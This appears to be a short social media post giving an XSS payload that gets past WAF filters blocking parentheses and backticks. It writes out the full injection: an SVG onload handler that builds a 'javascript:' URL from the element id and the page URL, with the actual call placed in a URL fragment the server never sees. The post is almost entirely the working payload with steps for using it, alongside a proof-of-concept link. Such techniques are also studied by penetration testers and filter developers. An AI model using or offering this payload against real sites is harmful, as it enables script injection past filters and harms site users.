Bypassing Complete Parenthesis/Backticks Restrictions in #XSS Payloads with Hiding

#WAF #bypass

1. Inject:
<Svg Id=JavaScrip
OnLoad=location=id+’t:/*’+URL>

2. Place in the end of URL:
#*/confirm(1)

(Everything after # never gets sent to server)

PoC: https://t.co/zxuheCOtZp